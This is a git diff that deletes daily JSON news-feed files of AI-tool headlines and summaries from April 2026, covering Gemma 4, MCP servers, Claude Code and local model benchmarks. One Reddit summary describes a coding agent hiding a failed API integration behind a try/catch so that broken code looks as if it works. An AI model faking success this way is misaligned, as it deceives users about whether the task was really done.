"@CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, and vision capabilities.", - "category": "ai_tools" - }, - { - "title": "YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3", - "url": "https://huggingface.co/blog/collinear-ai/yc-bench", - "source": "Hugging Face Blog", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-04T18:00:25.574Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users", - "url": "https://x.com/synthwavedd/status/2040442540508287101", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-04T16:20:03.318Z", - "summary": "@synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement.", - "category": "ai_tools" - }, - { - "title": "Components of A Coding Agent", - "url": "https://magazine.sebastianraschka.com/p/components-of-a-coding-agent", - "source": "Sebastian Raschka", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-04T18:00:27.636Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "RAG-Anything: All-in-One RAG Framework", - "url": "https://paperswithcode.com/papers/2510.12323", - "source": "Papers With Code", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.76, - "date": "2026-04-04T06:00:23.350Z", - "summary": null, - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-05.json b/data/news-feed-2026-04-05.json deleted file mode 100644 index bd95cd6..0000000 --- a/data/news-feed-2026-04-05.json +++ /dev/null @@ -1,261 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.524Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-05", - "article_count": 15, - "archived_story_count": 210, - "articles": [ - { - "title": "Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-04-05T05:17:04.000Z", - "summary": "Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. \n\nWe’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)).\n\nThe main ", - "category": "ai_models" - }, - { - "title": "[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.", - "url": "https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-04T22:09:24.000Z", - "summary": "Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot.\n\nSo I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise).\n\n \nThe cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project.\n\nWhen projects are imported, only t", - "category": "ai_research" - }, - { - "title": "I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks", - "url": "https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-05T05:47:58.000Z", - "summary": "I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli.\n\nIt's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it:\n\n* **Claude Code** — runs `soft-ue-cli` commands in the terminal\n* **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`)\n\nHere's what a typical session looks like. I ask Claude to \"inspect the player Blueprint and add a healt", - "category": "ai_tools" - }, - { - "title": "Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-04T19:54:55.000Z", - "summary": "Hi guys,\n\nWe’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source.\n\nThe biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t", - "category": "ai_models" - }, - { - "title": "Claude Code via VSCode extension still uses more tokens than Claude Code via terminal", - "url": "https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-05T03:05:56.000Z", - "summary": "Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience:\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/\n\nhttps://github.com/anthropics/claude-code/issues/19908\n\nDue to this it makes no sense to use it as you're essent", - "category": "ai_tools" - }, - { - "title": "What are your favorite MCP servers to use with Claude Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-05T06:12:54.000Z", - "summary": "I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it.", - "category": "ai_tools" - }, - { - "title": "I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed", - "url": "https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-04T16:52:56.000Z", - "summary": "Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally.\n\nHere's what's live right now:\n\n**Health and science:**\n\n* [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \\- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac", - "category": "ai_tools" - }, - { - "title": "Basic PSA. PocketPal got updated, so runs Gemma 4.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-05T02:59:44.000Z", - "summary": "Just because I've seen a couple of \"I want this on Android\" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates.\n\nI'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat.\n\nBut yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B", - "category": "ai_models" - }, - { - "title": "Local Claude Code with Qwen3.5 27B", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-05T02:19:54.000Z", - "summary": "after long research, finding best alternative for \n[Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) \nto use totally local environment for coding tasks \nI found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) \nhow to disable telemetry and make claude code totally offline.\n\nmodel used - Qwen3.5 27B \nQuant used - u", - "category": "ai_models" - }, - { - "title": "Gemma 4 vs Qwen3.5 on SVG style", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-05T01:56:43.000Z", - "summary": "Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth.\n\nI was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs!\n\nDid you find any areas when Qwen3.5 beats Gemma4 ?", - "category": "ai_models" - }, - { - "title": "[P] MCGrad: fix calibration of your ML model in subgroups", - "url": "https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-04T20:36:01.000Z", - "summary": "Hi r/MachineLearning,\n\nWe’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026.\n\n**The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., \"users in region X on mobile devices\"). Multicalibration aims to ensure reliability across such subpopulations.\n\n**The Solution:** MCGrad reformulates multicalibration ", - "category": "ai_research" - }, - { - "title": "Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily", - "url": "https://x.com/DoctorYev/status/2040484581581951473", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-04T20:22:18.777Z", - "summary": "Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem.", - "category": "ai_tools" - }, - { - "title": "Clement Delangue Is Telling Everyone to Move to Open and Local Models", - "url": "https://x.com/peteskomoroch/status/2040516928461303930", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T20:22:18.777Z", - "summary": "HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy.", - "category": "ai_tools" - }, - { - "title": "Voting for our open source AI art competition is open for the next 45 hours", - "url": "https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T20:06:51.000Z", - "summary": "If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used!", - "category": "creative_tools" - }, - { - "title": "We absolutely need Qwen3.6-397B-A17B to be open source", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T15:50:40.000Z", - "summary": "The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. \n\nIt feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet.\n\nWe have been comparing OS models with claude sonnet and opus left and right mont", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-06.json b/data/news-feed-2026-04-06.json deleted file mode 100644 index 1663ed7..0000000 --- a/data/news-feed-2026-04-06.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.736Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-06", - "article_count": 15, - "archived_story_count": 651, - "articles": [ - { - "title": "RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models", - "url": "https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/", - "source": "MarkTechPost", - "tags": [ - "product_launch", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-06T18:01:49.121Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "[P] Easily provide Wandb logs as context to agents for analysis and planning.", - "url": "https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-06T15:16:50.000Z", - "summary": "It is frustrating to use the Wandb CLI and MCP tools with my agents. For one, the MCP tool basically floods the context window and frequently errors out :/\n\nSo I built a cli tool that:\n\n* imports my wandb projects;\n* uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs;\n* is easy to use for agents;\n* provides greater context of past experiments;\n* does not flood the context window; and\n* easily tune exploration-exploitation while planning\n\nWould lov", - "category": "ai_research" - }, - { - "title": "Gemma4:26b's reasoning capabilities are crazy.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-06T13:41:08.000Z", - "summary": "Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability.\n\nThe script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central", - "category": "ai_models" - }, - { - "title": "[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?", - "url": "https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T11:55:38.000Z", - "summary": "Every few months someone posts about \"long-term memory for LLMs\" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction.\n\nThe continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem.\n\nHere is the distinction:\n\n**Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum", - "category": "ai_research" - }, - { - "title": "Claude Code can now submit your app to App Store Connect and help you pass review", - "url": "https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-06T04:22:25.000Z", - "summary": "I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code.\n\nThe problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing.\n\nWhat Claude Code can do through Blitz:\n\n* Create and edit", - "category": "ai_tools" - }, - { - "title": "Apex Protocol – An open MCP-based standard for AI agent trading", - "url": "https://apexstandard.org/", - "source": "Hacker News", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T00:50:32.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.94, - "date": "2026-04-05T20:26:58.000Z", - "summary": "Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases.\n\n## How it works\n\n- **Phase 1 (capture)**: Records live browser traffic via playwright-cli\n- **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code\n- **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing)\n- **Phase 4 (standards)**: 3 parallel Claude ", - "category": "ai_tools" - }, - { - "title": "I spent 3 months evolving SmartGallery into a free professional Local First DAM. v2.11 launches on April 9th", - "url": "https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-06T19:25:53.000Z", - "summary": "https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae\n\n**Hi everyone!**\n\nMany of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators.\n\n* I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com)\n* **", - "category": "creative_tools" - }, - { - "title": "Mercury – Free MCP proxy that cuts non-English token costs by 28-64%", - "url": "https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-06T10:08:59.000Z", - "summary": "I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. \n\nThe culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English.\n\n\n\nThe fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. It uses Google Translate (free, no API key needed) by default, so transl", - "category": "ai_tools" - }, - { - "title": "Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight", - "url": "https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/", - "source": "MarkTechPost", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.82, - "date": "2026-04-06T06:00:24.237Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "I built a macOS widget to track Claude usage limits in real-time", - "url": "https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-05T17:09:05.000Z", - "summary": "Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does:\n\n* Displays both the 5-hour session and 7-day weekly usage windows with progress bars\n* Shows countdown timers for when each window resets\n* Color-coded indicators — green → yellow → orange → red as you approach the limit\n* Auto-refreshes every 5 minutes\n* Comes in small, medium, and large widget sizes Quick demo: It sits rig", - "category": "ai_tools" - }, - { - "title": "After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success", - "url": "https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.54, - "date": "2026-04-06T02:38:02.000Z", - "summary": "I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't.\n\nHere's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on.\n\nThree days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc", - "category": "ai_tools" - }, - { - "title": "[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T19:46:13.000Z", - "summary": "***TL;DR***: Q8\\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation.\n\n**The problem**:\n\nOn Intel Arc Pro B70, Q8\\_0 models ran at 4.88 t/s while Q4\\_K\\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th", - "category": "ai_models" - }, - { - "title": "llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-06T19:13:30.000Z", - "summary": "Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards.", - "category": "ai_models" - }, - { - "title": "I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-06T19:00:28.000Z", - "summary": "So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\\_K\\_M quantization.\n\nThe goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware.\n\n# The Results (M5 32GB, Q4_K_M, llama-bench)\n\n# Top 15 by G", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-07.json b/data/news-feed-2026-04-07.json deleted file mode 100644 index 9e84573..0000000 --- a/data/news-feed-2026-04-07.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.905Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-07", - "article_count": 15, - "archived_story_count": 570, - "articles": [ - { - "title": "I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!", - "url": "https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-07T00:12:05.000Z", - "summary": "Hey everyone,\n\nI'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. \n\nI wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to ", - "category": "ai_tools" - }, - { - "title": "[D] MemPalace claims 100% on LoCoMo and a \"perfect score on LongMemEval.\" Its own BENCHMARKS.md documents why neither is meaningful.", - "url": "https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T12:32:42.000Z", - "summary": "A new open-source memory project called MemPalace launched yesterday claiming \"100% on LoCoMo\" and \"the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%.\" The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours.\n\nThe interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w", - "category": "ai_research" - }, - { - "title": "Built an open source memory layer for local AI agents, runs fully offline, no cloud needed", - "url": "https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-07T09:42:51.000Z", - "summary": "I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine.\n\nThe problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution.\n\nIt gives your agents persistent memory that survives restarts and crashes, semant", - "category": "ai_models" - }, - { - "title": "Mistral Introduces \"Voxtral TTS\": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-07T04:27:45.000Z", - "summary": "\n\nElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face.\n\nThe model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the \"ums\" and \"ahs\" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot.\n\n---\n\n####Key Highlights:\n\n- → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning\n\n- → Beats ElevenLabs Flash v2.5", - "category": "ai_models" - }, - { - "title": "OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update", - "url": "https://x.com/thdxr/status/2041330695822279077", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T02:17:09.479Z", - "summary": "Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements.", - "category": "ai_tools" - }, - { - "title": "Pro Subscription Usage", - "url": "https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.94, - "date": "2026-04-07T20:18:12.000Z", - "summary": "Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week.\n\n \nI build and host open source \"public service\" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point.\n\n \nBefore even entering my first prompt, it showed I had already used 11% of ", - "category": "ai_tools" - }, - { - "title": "Second Brain and Haah: human-agent-agent-human network with Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - 